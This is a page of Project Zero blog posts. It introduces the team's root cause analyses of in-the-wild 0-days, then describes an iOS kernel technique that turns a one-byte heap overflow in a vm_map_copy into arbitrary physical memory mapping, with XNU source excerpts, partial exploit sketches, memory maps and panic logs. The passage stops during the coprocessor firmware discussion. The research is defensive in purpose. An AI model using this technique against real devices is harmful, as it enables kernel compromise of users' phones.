
Root Cause Analyses for 0-day In-the-Wild Exploits


Posted by Maddie Stone, Project Zero


When a 0-day is exploited in the wild AND it is detected, we need to use that as an opportunity to learn as much as possible about the vulnerability and the exploit if we hope to make 0-day hard. One of the main methods to do that is to perform a root cause analysis (RCA) on the 0-day. 

Our effort on this began in earnest in the last quarter of 2019. Today we are beginning to publish the root cause analyses for 0-days exploited in the wild that we have completed. While we’re publishing some in bulk now to play “catch-up”, in the future we plan to post each one in a timely manner after it’s detected and disclosed. We think publishing technical details in a timely manner is important for transparency and so that the whole of the security community can make informed decisions and actions. 

We’ve added a new column to the “0day In the Wild” tracking spreadsheet that will link to any RCAs that we publish. We will also continue to update the following page on our blog as we publish additional RCAs.


For each of these root cause analyses, we are using a template. We developed this template based on what we, at Project Zero, find important and actionable about 0-days exploited in-the-wild, but we’d love your feedback on what other information would help you! We welcome any researchers and vendors who want to use our template and publish this information about 0-days they detect and/or analyze! 

When completing a root cause analysis we focus on the following areas.
  • Bug class
  • Details of the vulnerability, such as how to trigger, what it allows, etc.
  • Exploit method and whether or not it’s a known method
  • Hypothesis of how the vulnerability was found (code audit, fuzzing, variant analysis, etc.)
  • Any historical, present, and future bug context such as previous related bugs
  • Areas for variant analysis and any found variants
  • Structural improvements
    • Can you also kill the entire bug class?
    • Is there a way to make it much harder to exploit?
  • Potential detection methods for similar 0-days
    • Brainstorming ways that this 0-day exploit could have been caught while it was still a 0-day. Please note that this is different from “indicators of compromise” because we’re focusing on detecting while it’s still a 0-day.

We selected these areas because the vulnerability details and exploit method provide an in-depth explanation of the facts of the exploit: what the vulnerability is, how it works, and how it was exploited. Once we have the facts documented, we can then use those facts to inform our hypotheses and brainstorm how we can prevent the attackers from being able to do it again. While some of these ideas may be considered infeasible by vendors or may not work well in practice, some will be (and already have been) reasonable and actionable. The overarching goal is to force brainstorming in the hope of taking actions informed by the detected 0-day: actions to better detect, actions to better lock down, actions to prevent new vulnerabilities from being introduced, actions to make 0-day hard.

Out of the 20 0-days for 2019 (more on what we decided to include/exclude in our tracking here), we completed 8 root cause analyses that we’re publishing here today. Five of these cover the 6 0-days detected in August 2019 or later (when I joined the team and started this initiative 🙂). In addition, we’re publishing the two iOS 0-days from February 2019 that Project Zero reported to Apple in partnership with Google's Threat Analysis Group, and a Firefox 0-day that Project Zero had reported to Firefox, which was also independently discovered in-the-wild.


These RCAs provide technical details on what the vulnerability is and how it is exploited. We then hypothesize and brainstorm based on these details from our perspective as offensive security researchers. 

Our hope is that these analyses are helpful for others in the security and tech communities to act on data gleaned from detected 0-day exploits and help determine ways to make it more costly, more time consuming, and more difficult for attackers to use 0-days in the wild. Please reach out with any feedback and/or suggestions, and we hope that others will also begin publishing information from the RCA template in the future.

One Byte to rule them all

Posted by Brandon Azad, Project Zero

One Byte to rule them all, One Byte to type them,
One Byte to map them all, and in userspace bind them
-- Comment above vm_map_copy_t

For the last several years, nearly all iOS kernel exploits have followed the same high-level flow: memory corruption and fake Mach ports are used to gain access to the kernel task port, which provides an ideal kernel read/write primitive to userspace. Recent iOS kernel exploit mitigations like PAC and zone_require seem geared towards breaking the canonical techniques seen over and over again to achieve this exploit flow. But the fact that so many iOS kernel exploits look identical from a high level raises questions: Is targeting the kernel task port really the best exploit flow? Or has the convergence on this strategy obscured other, perhaps more interesting, techniques? And are existing iOS kernel mitigations equally effective against other, previously unseen exploit flows?

In this blog post, I'll describe a new iOS kernel exploitation technique that turns a one-byte controlled heap overflow directly into a read/write primitive for arbitrary physical addresses, all while completely sidestepping current mitigations such as KASLR, PAC, and zone_require. By reading a special hardware register, it's possible to locate the kernel in physical memory and build a kernel read/write primitive without a fake kernel task port. I'll conclude by discussing how effective various iOS mitigations were or could be at blocking this technique and by musing on the state-of-the-art of iOS kernel exploitation. You can find the proof-of-concept code here.

I - The Fellowship of the Wiring

A struct of power

While looking through the XNU sources, I often keep an eye out for interesting objects to manipulate or corrupt for future exploits. Soon after discovering CVE-2020-3837 (the oob_timestamp vulnerability), I stumbled across the definition of vm_map_copy_t:

struct vm_map_copy {
        int                     type;
#define VM_MAP_COPY_ENTRY_LIST          1
#define VM_MAP_COPY_OBJECT              2
#define VM_MAP_COPY_KERNEL_BUFFER       3
        vm_object_offset_t      offset;
        vm_map_size_t           size;
        union {
                struct vm_map_header    hdr;      /* ENTRY_LIST */
                vm_object_t             object;   /* OBJECT */
                uint8_t                 kdata[0]; /* KERNEL_BUFFER */
        } c_u;
};

This looked interesting to me for several reasons:

  1. The structure has a type field at the very start, so an out-of-bounds write could change it from one type to another, leading to type confusion. Because iOS is little-endian, the least significant byte comes first in memory, meaning that even a single-byte overflow would be sufficient to set the type to any of the three values.
  2. The type discriminates a union between arbitrary controlled data (kdata) and kernel pointers (hdr and object). Thus, corrupting the type could let us directly fake pointers to kernel objects without needing to perform any reallocations.
  3. I remembered reading about vm_map_copy_t being used as an interesting primitive in past exploits (before iOS 10), though I couldn't remember where or how it was used. vm_map_copy objects were also used by Ian Beer in Splitting atoms in XNU.

So, vm_map_copy looks like a possibly interesting target for corruption; however, it's only truly interesting if the code uses it in a truly interesting way.

Digging through osfmk/vm/vm_map.c, I found that vm_map_copyout_internal() does indeed use the copy object in a very interesting way. But first, let's talk a little more about what vm_map_copy is and how it works.

A vm_map_copy represents a copy-on-write slice of a process's virtual address space which has been packaged up, ready to be inserted into another virtual address space. There are three possible internal representations: as a list of vm_map_entry objects, as a vm_object, or as an inline array of bytes to be directly copied into the destination. We'll focus on types 1 and 3.

Fundamentally, the ENTRY_LIST type is the most powerful and general representation, while the KERNEL_BUFFER type is strictly an optimization. A vm_map_entry list consists of several allocations and several layers of indirection: each vm_map_entry describes a virtual address range [vme_start, vme_end) that is being mapped by a specific vm_object, which in turn contains a list of vm_pages describing the physical pages backing the vm_object.

A diagram showing the heap arrangement of a vm_map_copy object of type ENTRY_LIST. The vm_map_entrys are stored in a circular doubly-linked list. Each entry holds a pointer to a vm_object describing the memory region for that entry. Each vm_object contains a singly-linked list of vm_pages describing the physical pages backing the memory object.


Meanwhile, if the data being inserted is not shared memory and if the size is roughly two pages or less, then the vm_map_copy is simply over-allocated to hold the data contents inline in the same allocation, no indirection or further allocations required.

A diagram showing the layout of a vm_map_copy of type KERNEL_BUFFER. Rather than having a linked list of vm_map_entrys, there is an inline array of data to be copied directly into the receiving address space.


As a consequence of this optimization, the 8 bytes of the vm_map_copy object at offset 0x20 can be either a pointer to the head of a vm_map_entry list, or fully attacker-controlled data, all depending on the type field at the start. So corrupting the first byte of a vm_map_copy object causes the kernel to interpret arbitrary controlled data as a vm_map_entry pointer.
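To make the overlap concrete, here is a small compilable sketch using simplified stand-ins for the XNU types (the real headers carry more fields and packing attributes); the offsets match the arm64 layout described above.

#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified stand-ins for the XNU types; a sketch only, not the real headers. */
typedef uint64_t vm_object_offset_t;
typedef uint64_t vm_map_size_t;
typedef uint64_t vm_map_offset_t;

struct vm_map_links {
        void                 *prev;     /* struct vm_map_entry * in XNU */
        void                 *next;
        vm_map_offset_t       start;
        vm_map_offset_t       end;
};

struct vm_map_header {
        struct vm_map_links   links;
        /* nentries, entries_pageable, ... omitted */
};

struct vm_map_copy_sketch {
        int                   type;      /* offset 0x00 */
        vm_object_offset_t    offset;    /* offset 0x08 */
        vm_map_size_t         size;      /* offset 0x10 */
        union {
                struct vm_map_header  hdr;       /* ENTRY_LIST */
                void                 *object;    /* OBJECT */
                uint8_t               kdata[0];  /* KERNEL_BUFFER: inline data */
        } c_u;                           /* offset 0x18 */
};

int main(void) {
        /* The entry-list head (c_u.hdr.links.next) and bytes 8..15 of the
         * inline KERNEL_BUFFER data occupy the same storage at offset 0x20. */
        assert(offsetof(struct vm_map_copy_sketch, c_u.hdr.links.next) == 0x20);
        assert(offsetof(struct vm_map_copy_sketch, c_u.kdata) + 8 == 0x20);
        return 0;
}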

Comparing vm_map_copy objects of type KERNEL_BUFFER and ENTRY_LIST, the "next" pointer of the ENTRY_LIST-type copy falls into the inline data of the KERNEL_BUFFER-type copy.


With this understanding of vm_map_copy internals, let's turn back to vm_map_copyout_internal(). This function is responsible for taking a vm_map_copy and inserting it into the destination address space (represented by type vm_map_t). It is reachable when sharing memory between processes by sending an out-of-line memory descriptor in a Mach message: the out-of-line memory is stored in the kernel as a vm_map_copy, and vm_map_copyout_internal() is the function that inserts it into the receiving process's address space.
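As a rough illustration of how this path is reached from userspace, here is a minimal sketch (my own simplification, not code from the original exploit) that queues out-of-line memory on a holding port. Keeping the size under roughly two pages makes the kernel store it as a KERNEL_BUFFER copy, and receiving the message later drives vm_map_copyout_internal().

#include <mach/mach.h>
#include <string.h>

struct ool_msg {
    mach_msg_header_t         hdr;
    mach_msg_body_t           body;
    mach_msg_ool_descriptor_t ool;
};

/* Queue `size` bytes of out-of-line data on a port we own; the kernel copies
 * the data into a vm_map_copy (KERNEL_BUFFER for small sizes) until the
 * message is received. Error handling omitted for brevity. */
static kern_return_t
send_ool_data(mach_port_t holding_port, void *data, size_t size)
{
    struct ool_msg msg;
    memset(&msg, 0, sizeof(msg));

    msg.hdr.msgh_bits        = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0)
                               | MACH_MSGH_BITS_COMPLEX;
    msg.hdr.msgh_size        = (mach_msg_size_t)sizeof(msg);
    msg.hdr.msgh_remote_port = holding_port;

    msg.body.msgh_descriptor_count = 1;

    msg.ool.type       = MACH_MSG_OOL_DESCRIPTOR;
    msg.ool.address    = data;                    /* copied into the kernel */
    msg.ool.size       = (mach_msg_size_t)size;
    msg.ool.deallocate = FALSE;
    msg.ool.copy       = MACH_MSG_VIRTUAL_COPY;

    return mach_msg(&msg.hdr, MACH_SEND_MSG, (mach_msg_size_t)sizeof(msg), 0,
                    MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}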

As it turns out, things get rather exciting if vm_map_copyout_internal() processes a corrupted vm_map_copy containing a pointer to a fake vm_map_entry hierarchy. In particular, consider what happens if the fake vm_map_entry claims to be wired, which causes the function to try to fault in the page immediately:

kern_return_t
vm_map_copyout_internal(
    vm_map_t                dst_map,
    vm_map_address_t        *dst_addr,      /* OUT */
    vm_map_copy_t           copy,
    vm_map_size_t           copy_size,
    boolean_t               consume_on_success,
    vm_prot_t               cur_protection,
    vm_prot_t               max_protection,
    vm_inherit_t            inheritance)
{
...
    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }
...
    vm_map_lock(dst_map);
...
    adjustment = start - vm_copy_start;
...
    /*
     *    Adjust the addresses in the copy chain, and
     *    reset the region attributes.
     */
    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {
...
        entry->vme_start += adjustment;
        entry->vme_end += adjustment;
...
        /*
         * If the entry is now wired,
         * map the pages into the destination map.
         */
        if (entry->wired_count != 0) {
...
            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {
...
                m = vm_page_lookup(object, offset);
...
                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);
...
                offset += PAGE_SIZE_64;
                va += PAGE_SIZE;
           }
       }
   }
...
        vm_map_copy_insert(dst_map, last, copy);
...
    vm_map_unlock(dst_map);
...
}

Let's walk through this step-by-step. First, other vm_map_copy types are handled:

    if (copy->type == VM_MAP_COPY_OBJECT) {
...
    }
...
    if (copy->type == VM_MAP_COPY_KERNEL_BUFFER) {
...
    }

The vm_map is locked:

    vm_map_lock(dst_map);

We enter a for loop over the linked list of (fake) vm_map_entry objects:

    for (entry = vm_map_copy_first_entry(copy);
        entry != vm_map_copy_to_entry(copy);
        entry = entry->vme_next) {

We handle the case where the vm_map_entry is wired and should thus be faulted in immediately:

        if (entry->wired_count != 0) {

When set, we loop over every virtual address in the wired entry. Since we control the contents of the fake vm_map_entry, we can control the object pointer (of type vm_object) and offset value that are read:

            object = VME_OBJECT(entry);
            offset = VME_OFFSET(entry);
...
            while (va < entry->vme_end) {

We look up the vm_page struct for each physical page of memory that needs to be wired in. Since we control the fake vm_object and the offset, we can cause vm_page_lookup() to return a pointer to a fake vm_page struct whose contents we control:

                m = vm_page_lookup(object, offset);

And finally, we call vm_fault_enter() to fault in the page:

                vm_fault_enter(m,      // Calls pmap_enter_options()
                    dst_map->pmap,     // to map m->vmp_phys_page.
                    va,
                    prot,
                    prot,
                    VM_PAGE_WIRED(m),
                    FALSE,            /* change_wiring */
                    VM_KERN_MEMORY_NONE,    /* tag - not wiring */
                    &fault_info,
                    NULL,             /* need_retry */
                    &type_of_fault);

The call to vm_fault_enter() is rather complicated, so I won't put the code here. Suffice to say, by setting fields in our fake objects appropriately, it is possible to navigate vm_fault_enter() with a fake vm_page object in order to reach a call to pmap_enter_options() with a completely arbitrary physical page number:

kern_return_t
pmap_enter_options(
        pmap_t pmap,
        vm_map_address_t v,
        ppnum_t pn,
        vm_prot_t prot,
        vm_prot_t fault_type,
        unsigned int flags,
        boolean_t wired,
        unsigned int options,
        __unused void   *arg)

pmap_enter_options() is responsible for modifying the page tables of the destination to insert the translation table entry that will establish a mapping from a virtual address to a physical address. Analogously to how vm_map manages the state for the virtual mappings of an address space, the pmap struct manages the state for the physical mappings (i.e. page tables) of an address space. And according to the sources in osfmk/arm/pmap.c, no further validation is performed on the supplied physical page number before the translation table entry is added.
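To illustrate the key point numerically (a simplification of the real TTE construction, which also sets attribute, permission, and validity bits): with 16K pages, the supplied page number is simply shifted into the level 3 TTE's output-address field, and nothing constrains it to AP DRAM.

#include <stdint.h>

typedef uint32_t ppnum_t;

/* Sketch: the output-address portion of a 16K-granule level 3 TTE is just the
 * caller-supplied page number shifted by the page shift (14). */
static uint64_t
l3_tte_output_address(ppnum_t pn)
{
    return ((uint64_t)pn << 14) & 0x0000FFFFFFFFC000ULL;  /* bits 47:14 */
}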

Thus, our corrupted vm_map_copy object actually gives us an incredibly powerful primitive: mapping arbitrary physical memory directly into our process in userspace!

If we start with a KERNEL_BUFFER vm_map_copy and corrupt the first byte to change the type to ENTRY_LIST, then we can control the value of the "next" field to make it point to a fake vm_map_entry hierarchy, including a fake vm_page. The physical address specified in the vm_page's "vmp_phys_page" field will be mapped by the call to vm_map_copyout_internal().

An old friend

I decided to build the POC for the vm_map_copy physical memory mapping technique on top of the kernel read/write primitive provided by the oob_timestamp exploit for iOS 13.3. There were two primary reasons for this.

First, I did not have a good bug available to develop a complete exploit with it. Even though I had initially stumbled upon the idea while trying to exploit the oob_timestamp bug, it quickly became apparent that that bug wasn't a good fit for this technique.

Second, I wanted to evaluate the technique independently of the vulnerability or vulnerabilities used to achieve it. It seemed that there was a good chance that the technique could be made deterministic (that is, without a failure case); implementing it on top of an unreliable vulnerability would make it hard to evaluate separately.

This technique most naturally fits a controlled one-byte linear heap overflow in any of the allocator zones kalloc.80 through kalloc.32768 (i.e., general-purpose allocations of between 65 and 32768 bytes). For ease of reference in the rest of this post, I'll simply call it the one-byte exploit technique.

Leaving the Shire

We've already laid out the bones of the technique above: create a vm_map_copy of type KERNEL_BUFFER containing a pointer to a fake vm_map_entry list, corrupt the type to ENTRY_LIST, receive it with vm_map_copyout_internal(), and get arbitrary physical memory mapped into our address space. However, successful exploitation is a little bit more complicated:

  1. We still have not addressed where this fake vm_map_entry/vm_object/vm_page hierarchy will be constructed.
  2. We need to ensure that the kernel thread that calls vm_map_copyout_internal() does not crash, panic, or deadlock after mapping the physical page.

  3. Mapping one physical page is great, but probably not sufficient by itself to achieve arbitrary kernel read/write. This is because:

    1. The kernelcache's exact load address in physical memory is unknown, so we cannot map any specific page of it directly without locating it first.
    2. It is possible that some hardware device exposes an MMIO interface that is powerful enough by itself to build some sort of read/write primitive; however, I'm not aware of any such component.

    Thus, we will need to map more than one physical address, and most likely we will need to use data read from one mapping to find the physical address to use for another. This means our mapping primitive can not be one-shot.

  4. The call to vm_map_copy_insert() after the for loop tries to zfree() the vm_map_copy to the vm_map_copy_zone. This will panic given a vm_map_copy originally of type KERNEL_BUFFER, since KERNEL_BUFFER objects are initially allocated using kalloc().

    Thus, the only way to safely break out of the for loop and resume normal operation is to first get kernel read/write and then patch up state in the kernel to prevent this panic.

These constraints will guide the course of this exploit technique.

A short cut to PAN

An important prerequisite for the one-byte technique is to create a fake vm_map_entry object hierarchy at a known address. Since we are already building this POC on oob_timestamp, I decided to leverage a neat trick I picked up while exploiting that bug. In the real world, another vulnerability in addition to the one-byte overflow might be needed to leak a kernel address.

While developing the POC for oob_timestamp, I learned that the AGXAccelerator kernel extension provides a very interesting primitive: IOAccelSharedUserClient2 and IOAccelCommandQueue2 together allow the creation of large regions of pageable memory shared between userspace and the kernel. Having access to user/kernel shared memory can be extremely helpful when developing exploits, since you can place fake kernel data structures there and manipulate them while the kernel accesses them. Of course, this AGXAccelerator primitive is not the only way to get kernel/user shared memory; the physmap, for example, also maps most of DRAM into virtual memory, so it can also be used to reflect userspace memory contents into the kernel. However, the AGXAccelerator primitive is often much more convenient in practice: for one, it provides a very large contiguous shared memory region in a much more constrained address range; and for two, it's easier to leak addresses of adjacent objects to locate it.

Now, before the iPhone 7, iOS devices did not support the Privileged Access Never (PAN) security feature. This meant that all of userspace was effectively shared memory with the kernel, and you could just overwrite pointers in the kernel to point to fake data structures in userspace.

However, modern iOS devices enable PAN, so attempts by the kernel to directly access userspace memory will fault. This is what makes the existence of the AGXAccelerator shared memory primitive so useful: if you can establish a large shared memory region and learn its address in the kernel, that's basically equivalent to having PAN turned off.

Of course, a key part of that sentence is "and learn its address in the kernel"; doing that usually requires a vulnerability and some effort. Instead, as we already rely on oob_timestamp, we will simply hardcode the shared memory address and note that finding the address dynamically is left as an exercise for the reader.

At the sign of the panicking POC

With kernel read/write and a user/kernel shared memory buffer in hand, we are ready to write the POC. The overall flow of the exploit is essentially what was outlined above.

We start by creating the shared memory region in the kernel.

We initialize a fake vm_map_entry list inside the shared memory. The entry list contains 3 entries: a "ready" entry, a "mapping" entry, and a "done" entry. Together these entries will represent the current state of each mapping operation.

There are 3 fake vm_map_entry objects in the shared memory buffer, representing the 3 states of our mapping operation. To start, the "ready" entry forwards to the "done" entry, which loops back to itself.


We send an out-of-line memory descriptor containing a fake vm_map_header in a Mach message to a holding port. The out-of-line memory is stored in the kernel as a vm_map_copy object of type KERNEL_BUFFER (value 3).

A vm_map_copy of type KERNEL_BUFFER includes inline kernel data; overlapping what would be the "next" field in an ENTRY_LIST copy is the value of a pointer to the "ready" entry in our shared memory buffer. But at this point, the copy's type is KERNEL_BUFFER, so the "pointer" is really just inline data.


We simulate a one-byte linear heap overflow that corrupts the type field of the vm_map_copy, changing it to ENTRY_LIST (value 1).

A one-byte overflow into the vm_map_copy changes its type from KERNEL_BUFFER to ENTRY_LIST. At this point, the inline data is now interpreted as a vm_map_header with a "next" field pointing to the "ready" entry.


We start a thread that receives the Mach message queued on the holding port. This triggers a call to vm_map_copyout_internal() on the corrupted vm_map_copy.

Due to the way the vm_map_entry list was initially configured, the vm_map_copyout thread will spin in an infinite loop on the "done" entry, ready for us to manipulate it.

Calling vm_map_copyout_internal() on the corrupted vm_map_copy will traverse the linked list, going from "ready" to "done" and spinning in an infinite loop on "done".


At this point, we have a kernel thread that is spinning ready to map any physical page we request.

To map a page, we first set the "ready" entry to link to itself, and then set the "done" entry to link to the "ready" entry. This will cause the vm_map_copyout thread to spin on "ready".

To get ready to map a physical page, we make the "ready" entry point to itself and then make the "done" entry point to the "ready" entry. The for loop in vm_map_copyout_internal() will follow the updated link from the "done" entry to the "ready" entry then spin on "ready". This state indicates that we're ready to set up the physical mapping.


While spinning on "ready", we mark the "mapping" entry as wired with a single physical page and link it to the "done" entry, which we link to itself. We also populate the fake vm_object and vm_page to map the desired physical page number.

Now that the mapping primitive is "ready", we will modify the "mapping" entry to map the desired physical page. We mark it as wired and specify a vm_object and vm_page containing the physical address to map. Also, we make the "done" entry link to itself to ensure the mapping happens only once.


Then, we can perform the mapping by linking the "ready" entry to the "mapping" entry. vm_map_copyout_internal() will map in the page and then spin on the "done" entry, signaling completion.

Finally, we map a page by simply linking the "ready" entry to the "mapping" entry, causing vm_map_copyout_internal() to follow the link and process the "mapping" entry. Since it is wired, it maps in the page right away. Finally, once the mapping is complete, vm_map_copyout_internal() will follow the link and start spinning on the "done" entry, indicating that the operation has completed.
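Putting the linking steps together, the userspace side of the state machine looks roughly like the sketch below. The fake_entry layout is deliberately simplified, and the fake vm_object/vm_page setup is elided; in a real exploit the field offsets must exactly match the target kernel build, and the values written into the link fields are the kernel addresses of the entries in the shared buffer.

#include <stdint.h>

/* Highly simplified fake vm_map_entry: only the link fields are shown. */
struct fake_entry {
    uint64_t vme_prev;
    uint64_t vme_next;
    /* vme_start/vme_end, wired_count, object, offset, ... (layout-dependent) */
};

/* User-visible views of the three fake entries in the shared buffer, plus the
 * kernel virtual addresses that the spinning thread will dereference. */
static volatile struct fake_entry *ready, *mapping, *done;
static uint64_t ready_kaddr, mapping_kaddr, done_kaddr;

static void
map_one_physical_page(uint64_t phys_page_number)
{
    /* 1. Park the spinning kernel thread on "ready". */
    ready->vme_next = ready_kaddr;
    done->vme_next  = ready_kaddr;

    /* 2. While it spins on "ready", stage the wired "mapping" entry: point its
     *    fake vm_object/vm_page at phys_page_number (elided) and make it
     *    forward to "done", which now loops back on itself. */
    (void)phys_page_number;              /* fake vm_page setup elided */
    done->vme_next    = done_kaddr;
    mapping->vme_next = done_kaddr;

    /* 3. Fire: the thread follows ready -> mapping, faults in the page via
     *    vm_fault_enter()/pmap_enter_options(), then parks on "done". */
    ready->vme_next = mapping_kaddr;

    /* 4. Poll shared state until the thread reaches "done" before reusing
     *    the entries for the next mapping. */
}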


This gives us a reusable primitive that maps arbitrary physical addresses into our process. As an initial proof of concept, I mapped the non-existent physical address 0x414140000 and tried to read from it, triggering an LLC bus error from EL0:

This is a screenshot of a device panic.

The mines of memory

At this point we have proved that the mapping primitive is sound, but we still don't know what to do with it.

My first thought was that the easiest approach would be to go after the kernelcache image in memory. Note that on modern iPhones, even with a direct physical read/write primitive, KTRR prevents us from modifying the locked down portions of the kernel image, so we can't just patch the kernel's executable code. However, certain segments of the kernelcache image remain writable at runtime, including the part of the __DATA segment that contains sysctls. Since sysctls have been (ab)used before to build read/write primitives, this felt like a stable path forward.

The challenge was then to use the mapping primitive to locate the kernelcache in physical memory, so that the sysctl structs could then be mapped into userspace and modified.

But first, before we figure out how to locate the kernelcache, some background on physical memory on the iPhone 11 Pro.

The iPhone 11 Pro has 4 GB of DRAM based at physical address 0x800000000, so physical DRAM addresses span 0x800000000 to 0x900000000. Of this, the range 0x801b80000 to 0x8ec9b4000 is reserved for the Application Processor (AP), the main processor of the phone which runs the XNU kernel and applications. Memory outside this region is reserved for coprocessors like the Always On Processor (AOP), Apple Neural Engine (ANE), SIO (possibly Apple SmartIO), AVE, ISP, IOP, etc. The addresses of these and other regions can be found by parsing the devicetree or by dumping the iboot-handoff region at the start of DRAM.

A map of DRAM. The first little slice at the beginning, and a bigger slice at the end, are reserved for coprocessors, while the vast bulk of DRAM in the middle is for the Application Processor.


At boot time, the kernelcache is loaded contiguously into physical memory, which means that finding a single kernelcache page is sufficient to locate the whole image. Also, while KASLR may slide the kernelcache by a large amount in virtual memory, the load address in physical memory is quite constrained: in my testing, the kernel header was always loaded at an address between 0x805000000 and 0x807000000, a range of just 32 MB.

As it turns out, this range is smaller than the kernelcache itself at 0x23d4000 bytes, or 35.8 MB. Thus, we can be certain at runtime that address 0x807000000 contains a kernelcache page.
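A quick way to convince yourself of this claim (the constants are the measurements quoted above for this particular device and build):

#include <assert.h>
#include <stdint.h>

int main(void) {
    const uint64_t base_min = 0x805000000;   /* lowest observed load address */
    const uint64_t base_max = 0x807000000;   /* highest observed load address */
    const uint64_t kc_size  = 0x23d4000;     /* kernelcache size, ~35.8 MB */
    const uint64_t probe    = 0x807000000;   /* fixed physical probe address */

    /* For every possible 16K-aligned load address in the observed window, the
     * probe address falls inside the kernelcache image, because the image is
     * larger than the 32 MB window over which the load address varies. */
    for (uint64_t base = base_min; base <= base_max; base += 0x4000) {
        assert(probe >= base && probe < base + kc_size);
    }
    return 0;
}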

However, I quickly ran into panics when trying to map the kernelcache:

panic(cpu 4 caller 0xfffffff0156f0c98): "pmap_enter_options_internal: page belongs to PPL, " "pmap=0xfffffff031a581d0, v=0x3bb844000, pn=2103160, prot=0x3, fault_type=0x3, flags=0x0, wired=1, options=0x1"

This panic string purports to come from the function pmap_enter_options_internal(), which is in the open-source part of XNU (osfmk/arm/pmap.c), and yet the panic is not present in the sources. Thus, I reversed the version of pmap_enter_options_internal() in the kernelcache to figure out what was happening.

The issue, I learned, is that the specific page I was trying to map was part of Apple's Page Protection Layer (PPL), a portion of the XNU kernel that manages page tables and that is considered even more privileged than the rest of the kernel. The goal of PPL is to prevent an attacker from modifying protected pages (in particular, executable code pages for codesigned binaries) even after compromising the kernel to obtain a read/write capability.

In order to enforce that protected pages cannot be modified, PPL must protect page tables and page table metadata. Thus, when I tried to map a PPL-protected page into userspace, it triggered a panic.

if (pa_test_bits(pa, 0x4000 /* PP_ATTR_PPL? */)) {
    panic("%s: page belongs to PPL, " ...);
}

if (pvh_get_flags(pai_to_pvh(pai)) & PVH_FLAG_LOCKDOWN) {
    panic("%s: page locked down, " ...);
}

The presence of PPL significantly complicates use of the physical mapping primitive, since trying to map a PPL-protected page will panic. And the kernelcache itself contains many PPL-protected pages, splitting the contiguous 35 MB binary into smaller PPL-free chunks that no longer bridge the physical slide of the kernelcache. Thus, there is no longer a single physical address we can (safely) map that is guaranteed to be a kernelcache page.

And the rest of the AP's DRAM region is an equally treacherous minefield. Physical pages are grabbed for use by PPL and returned to the kernel as-needed, and so at runtime PPL pages are scattered throughout physical memory like mines. Thus, there is no static address anywhere that is guaranteed not to blow up.

Looking at the AP's DRAM over time, unmappable pages are scattered semi-randomly throughout the physical address space, and pages can both enter and exit PPL.
A map showing the protection flags on every page of AP DRAM on the A13 over time. Yellow is PPL+LOCKDOWN, red is PPL, green is LOCKDOWN, and blue is unguarded (i.e., mappable).

II - The Two Techniques

The road to DRAM's guard

Yet, that's not quite true. The Application Processor's DRAM region might be a minefield, but anything outside of it is not. That includes the DRAM used by coprocessors and also any other addressable components of the system, such as hardware registers for system components that are typically accessed via memory-mapped I/O (MMIO).

With such a powerful primitive, I expect that there are a plethora of techniques that could be used to build a read/write primitive. And I expect that there are many clever things that could be done by leveraging direct access to special hardware registers and coprocessors. Unfortunately, this is not an area with which I'm very familiar, so I'll just describe one (failed) attempt to bypass PPL here.

The idea I had was to take control of some coprocessor and use execution on both the coprocessor and the AP together to attack the kernel. First, we use the physical mapping primitive to modify the part of DRAM storing data for a coprocessor in order to get code execution on that coprocessor. Next, back on the main processor, we use the mapping primitive a second time to map and disable the coprocessor's Device Address Resolution Table, or DART (basically an IOMMU). With code execution on the coprocessor and the corresponding DART disabled, we have direct unguarded access from the coprocessor to physical memory, allowing us to completely sidestep the protections of PPL (which are only enforced from the AP).

However, whenever I tried to modify certain regions of DRAM used by coprocessors, I would get kernel panics. In particular, the region 0x800000000 - 0x801564000 appeared to be readonly:

panic(cpu 5 caller 0xfffffff0189fc598): "LLC Bus error from cpu1: FAR=0x16f507f10 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214000800000000/0x1 addr=0x800000000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff020ca4598): "LLC Bus error from cpu1: FAR=0x15f03c000 LLC_ERR_STS/ADR/INF=0x11000ffc00000080/0x214030800104000/0x1 addr=0x800104000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

panic(cpu 5 caller 0xfffffff02997c598): "LLC Bus error from cpu1: FAR=0x10a024000 LLC_ERR_STS/ADR/INF=0x11000ffc00000082/0x21400080154c000/0x1 addr=0x80154c000 cmd=0x14(acc_cifl2c_cmd_ncwr)"

This was very weird: these addresses are outside of the KTRR lockdown region, so nothing should be able to block writing to this part of DRAM with a physical mapping primitive! Thus, there must be some other undocumented lockdown enforced on this physical range.

On the other hand, the region 0x801564000 - 0x801b80000 remains writable as expected, and writing to different areas in this region produces odd system behaviors, supporting the theory that this is corrupting data used by coprocessors. For example, writing to some areas would cause the camera and flashlight to become unresponsive, while writing to other areas would cause the phone to panic when the mute slider was switched on.

To get a better sense of what might be happening, I identified the regions in this range by examining the devicetree and dumping memory. In the end, I discovered the following layout of coprocessor firmware segments in the range 0x800000000 - 0x801b80000:

Mapping out the data in the (smaller) physical memory region before the AP carveout, it seems that there are in fact two segments: A larger read-only span containing __TEXT segments (i.e. code) for coprocessor firmwares, and a smaller writable span containing the corresponding __DATA segments of the same firmwares.

Thus, the regions that are locked down are all __TEXT segments of coprocessor firmwares; this strongly suggests that Apple has added a new mitigation to make coprocessor __TEXT segments read-only in physical memory, similar to KTRR on the AMCC (probably Apple's memory controller) but for coprocessor firmwares instead of just the AP kernel. This might be the undocumented CTRR mitigation referenced in the originally published xnu-6153.41.3 sources that appears to be an enhanced replacement for KTRR on A12 and up; Ian Beer suggested CTRR might stand for Coprocessor Text Readonly Region.

